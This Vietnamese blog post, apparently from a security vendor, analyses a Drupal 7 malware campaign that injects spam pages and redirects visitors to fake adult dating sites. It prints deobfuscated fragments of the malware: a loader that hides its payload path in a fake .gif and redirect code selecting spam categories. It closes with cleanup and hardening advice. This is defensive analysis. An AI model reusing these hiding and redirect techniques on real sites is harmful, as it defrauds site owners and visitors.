Một loại phần mềm độc hại chuyển hướng mới đã xuất hiện khi khách truy cập trang web được chuyển hướng đến các trang web hẹn hò người lớn giả mạo. Trong chiến dịch phần mềm độc hại này, hàng nghìn trang giả mạo được thêm vào trang web và được Google Tìm kiếm lập chỉ mục. Nếu bạn tìm kiếm site: example.com bạn sẽ thấy những kết quả như sau:
Chiến dịch phần mềm độc hại được biết là thêm các trang giả mạo &chuyển hướng cho các bài tiểu luận, dược phẩm, trang web hẹn hò, cho vay, phương tiện truyền thông và các trang web spam tải xuống độc hại cùng những trang khác.
Blog liên quan - Hack chuyển hướng WordPress
Nếu bạn nhấp vào bất kỳ liên kết nào được Google Tìm kiếm lập chỉ mục, bạn sẽ được chuyển hướng đến các trang web có nội dung và thông điệp rõ ràng, chẳng hạn như trang được hiển thị bên dưới.
Làm cách nào để biết trang web của bạn có bị nhiễm hay không?
- Có rất nhiều kết quả Tìm kiếm của Google cho các trang bạn chưa tạo
- Nếu bạn nhấp vào bất kỳ liên kết trang web nào của mình trong Google, bạn sẽ được chuyển hướng đến các trang web người lớn / cờ bạc / hẹn hò
- Các trang mới được thêm vào trang web của bạn mà bạn không biết
- Người dùng quản trị không xác định được thêm vào trang tổng quan quản trị của bạn
- Trang web của bạn rất chậm
- Bạn đã nhận được thông báo cảnh báo từ Google Search Console.
Làm cách nào để tìm ra bản hack chuyển hướng trong các trang web Drupal?
Chúng tôi đã điều tra chiến dịch tấn công phần mềm độc hại này cho Drupal 7 và phát hiện ra rằng tin tặc đã khéo léo che giấu phần mềm độc hại bằng các kỹ thuật tinh vi, khiến người ta khó xác định được mã độc.
Khi quét trang web bằng Máy quét phần mềm độc hại của Astra, chúng tôi đã tìm thấy một tệp đáng ngờ tại includes/template.inc
Khi điều tra thêm, người ta thấy rằng template.inc tệp đã được thêm vào ‘Drupal Registry’ để nó được tự động tải với mỗi yêu cầu. Giá trị cấu hình được đặt trong cơ sở dữ liệu.
Bước tiếp theo là giải mã mã trong tệp được gắn cờ. Cụ thể là getMimeDescription() chức năng.
public function getMimeDescription($documentDir) {
$indicies=array(8, 5, 0, 1, 9, 4, 6, 7, 3, 2);
$mimeMarkers=array('themes', 'Porto', 'loader1', 'light_rounded', 'prettyPhoto', 'all', 'images', 'prettyPhoto', 'sites', 'vendor');
$mimeType='gif';
$selecteds=array();
foreach($indicies as $index) {
$selected=$mimeMarkers[$index];
$selecteds[]=$selected;
}
array_unshift($selecteds, $documentDir);
$cachePath=join('/', $selecteds);
return $cachePath.'.'.$mimeType;
}
}Khi đoạn mã trên được đánh giá, đoạn mã này sẽ đưa ra đường dẫn đến một tệp độc hại khác đang hoạt động:
sites/all/themes/Porto/vendor/prettyPhoto/images/prettyPhoto/light_rounded/loader1.gif
Sau khi thổi phồng chuỗi bị xì hơi bằng cách sử dụng gzinflate() trong PHP, một số mã hóa base64 đã được phát hiện.
Sau nhiều cấp giải mã mã ở trên, mã độc thực sự đã được phát hiện như bạn có thể thấy trong đoạn mã bên dưới.
$v266=array('essay','pharm','dating','loan','media','download');
if(isset($this->v254['theme'])){
$this->v12->t4("page theme: '{
0
}
'",$this->v254['theme']);
$v267=strtolower($this->v254['theme']);
foreach($v266 as$v80){
if(strpos($v267,$v80)!==false)return$v80;
}
}
else{
$this->v12->t4("page has NO theme. old dor");
}
return'default';
}
function t170($v268,$v148){
$v269=$this->v255->t147($v268['exit']['url'],$this->v254,$v148);
return array('name'=>$v268['name'],'exit'=>$v268['exit']['type'],'url'=>$v269[00],'extparams'=>$v269[01]);
}Làm cách nào để ngăn trang web của bạn chuyển hướng đến Trang web hẹn hò giả dành cho người lớn?
Để loại bỏ hoàn toàn việc chuyển hướng trang web hẹn hò dành cho người lớn giả mạo, bạn sẽ phải quét các tệp và cơ sở dữ liệu trang web của mình để tìm phần mềm độc hại. Như bạn đã thấy trong phân tích hack này, tin tặc khéo léo che giấu mã chuyển hướng bằng nhiều cấp kỹ thuật làm rối và ẩn mã.
Để tìm hiểu cách tự làm sạch phần mềm độc hại, hãy tham khảo hướng dẫn đầy đủ của chúng tôi về cách xóa phần mềm độc hại trên WordPress.
Khuyến nghị bảo mật để ngăn chặn chuyển hướng trang web hẹn hò
- Sao lưu trang web của bạn trong trường hợp nó cần được khôi phục
- Cập nhật CMS, plugin và chủ đề lên phiên bản mới nhất của chúng
- Xác định nguyên nhân của vụ tấn công và vá lỗi đó
- Bảo vệ trang web của bạn bằng tường lửa vững chắc
- Tránh gán quyền tệp 777 cho bất kỳ tệp hoặc thư mục nào. Đặt quyền đối với thư mục thành 755 đối với thư mục và 644 đối với tệp
- Kiểm tra xem có người dùng quản trị không xác định nào đã được thêm vào chương trình phụ trợ không
- Xóa mọi tệp sao lưu (.zip, .sql, .tar, v.v.) trong thư mục public_html